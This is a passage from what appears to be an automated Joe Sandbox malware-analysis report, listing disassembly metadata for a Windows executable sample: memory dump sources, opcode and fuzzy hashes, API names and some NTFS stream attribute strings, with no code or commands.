                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: gj
                                                                                        • API String ID: 0-4203073231
                                                                                        • Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                        • Instruction ID: c2b5df2013b6c20779c4feafde9e5283f651e319cd52f8460cb88330dd570844
                                                                                        • Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                        • Instruction Fuzzy Hash: B451B2377286908BD754CF25E800A9EB3A5F788758F445126EF8A93B09CB3DE945CF40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                        • Instruction ID: f7236b79e95b29fe3d6ec8471fa32a4bc352dadd79d7faabb2678ff408ea45ab
                                                                                        • Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                        • Instruction Fuzzy Hash: F641BD22714A4586EB04EF2AE8142A9B3A5AB5CFD0B8AA036DF5D87754DF3CD042C300
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapProcess
                                                                                        • String ID:
                                                                                        • API String ID: 54951025-0
                                                                                        • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                        • Instruction ID: f6dcb39d1ef8bc64d36ebaed8beb13f39e9ac4d364892c7955c0c673545d4954
                                                                                        • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                        • Instruction Fuzzy Hash: B5B09220E17A02C2EA483B11EC8229862A8BF8C714FD4A078C20C41320DF3C20EA4721
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
                                                                                        • Instruction ID: 3529c466bd1af5cbedcb64c39c2db11d68416c7dd0dbc8f22e92759fbb659622
                                                                                        • Opcode Fuzzy Hash: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
                                                                                        • Instruction Fuzzy Hash: 01822773A096C186D705DF28D8042BCBBA1EB99B88F5DD13ADA5E07385EB3DD845C320
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                        • Instruction ID: f92c70e2ce852ddf44c41db925263c37210b03c22997a1e82463dc4d90422dc5
                                                                                        • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                        • Instruction Fuzzy Hash: B6627E9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
                                                                                        • Instruction ID: 7619754d0bcb4accb11431d2aea8133b88d7e12e092cb8edbfd12a12218b7fbc
                                                                                        • Opcode Fuzzy Hash: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
                                                                                        • Instruction Fuzzy Hash: 518202B3A096C18AD724DF28D8446FCBB61FB99B48F499136CA4D47789DB3CD485C720
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                        • Instruction ID: cf03f1485b29867792e90a5addf42280e7cd100bdf891cc75bd92561bbb03a3c
                                                                                        • Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                        • Instruction Fuzzy Hash: F322E273B206508BD728CF25D89AE5E3766F798344B4B9228DF4ACB785DB38D505CB40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                        • Instruction ID: ecab8af820fa9ffe76b94a2cbddc5cf95c4cb7d1e1fbb5183df35fa56acbbd25
                                                                                        • Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                        • Instruction Fuzzy Hash: 3B32E173A081918BE71CDF24D950ABC77A1FB98B08F499139DB5A87B88DB3CE851C750
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                        • Instruction ID: e252f421b6f4d2e2e68f70ac1cf90da39eb23e9a3f3d63f2296d40829b727a3d
                                                                                        • Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                        • Instruction Fuzzy Hash: E8C18BB7B281908FE350CF6AE400A9D7BB1F39878CB51A125DF59A3B09D639E645CB40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                        • Instruction ID: 3cc632eb038663b2a64ca953516c85e098c1f65e0129fd03ef8cfbe2c77a06a3
                                                                                        • Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                        • Instruction Fuzzy Hash: E2A13573A081C246EB25EA24D8447FEA692EFE9744F896535DE4D07796DF3CE881C320
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                        • Instruction ID: 80cac46b1ef9909cf009915e2296295d915c73636ccb477a4c40043b300539c4
                                                                                        • Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                        • Instruction Fuzzy Hash: A9C10677A291E04DE302CBB5A4248FD3FF1EB1E34DB4A4251EF9666B4AD6285201DF70
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID:
                                                                                        • API String ID: 190572456-0
                                                                                        • Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                        • Instruction ID: a1148d3bf9307cdd6d0a70312391db3c0091344be19d31ea2c0935f162703b39
                                                                                        • Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                        • Instruction Fuzzy Hash: 4B910462B1858196EB11EF29D8417EDA721FFA9788F842031EF4E07B49EF38D646C310
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                        • Instruction ID: 4ac224750d6bfb67acf9232459eb84dd1e35a0d2149e190969adf66946f4a257
                                                                                        • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                        • Instruction Fuzzy Hash: C9611122B185D189EB11DF75D9004FDBFB1AF5E784B869032CE9A5764ACB3CE506CB20
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                        • Instruction ID: f1ffa4dc70082cc2cc68d695b26b1408614fe47b7ca5a7288eef7f1bcf2da4b7
                                                                                        • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                        • Instruction Fuzzy Hash: 78514473B181914BE3289F28E8047BDB752FB98B48F895130DB494769ADF3DE540CB10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                        • Instruction ID: 377cc9b7522830858ba75205f86ce117cbc54c48608caaeaa5c38048355e5c52
                                                                                        • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                        • Instruction Fuzzy Hash: 0731D6B2A185814BD718EE26D9902BEB7D1FF88344F449139DF5687742DB3CE442C710
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                                                        • Instruction ID: e8b93dccb6a53164415fd2e190d3be0731b7a2e662e4136e529d491cd27258f2
                                                                                        • Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                                                        • Instruction Fuzzy Hash: DDF0FE65F1C0034AFB782038DC2933990569F1B310FD4A835E31FC62C5EBADE8815329
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                        • Instruction ID: d85718c3fe85318173eac07124f54a66c67f5d21550e788030c58ebfb2e3ffa4
                                                                                        • Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                        • Instruction Fuzzy Hash: 78A0026190CC42E0F648AB10EC60575B334FF69711BD03035F44D421A4DF7CB482C325
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                                        • API String ID: 3668304517-727060406
                                                                                        • Opcode ID: 74d68d42448b2834d40d390ad32eed462d68e051ec4e29c63c0154d737a3ceed
                                                                                        • Instruction ID: eb46a88c5cd9c53461370ca666a23f642892c669916631b387f6625e1fb6480d
                                                                                        • Opcode Fuzzy Hash: 74d68d42448b2834d40d390ad32eed462d68e051ec4e29c63c0154d737a3ceed
                                                                                        • Instruction Fuzzy Hash: B241D836B05B0199FB14AF65E8803E973A9EF58798F80213ADA5C077A9EF38E155C350
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
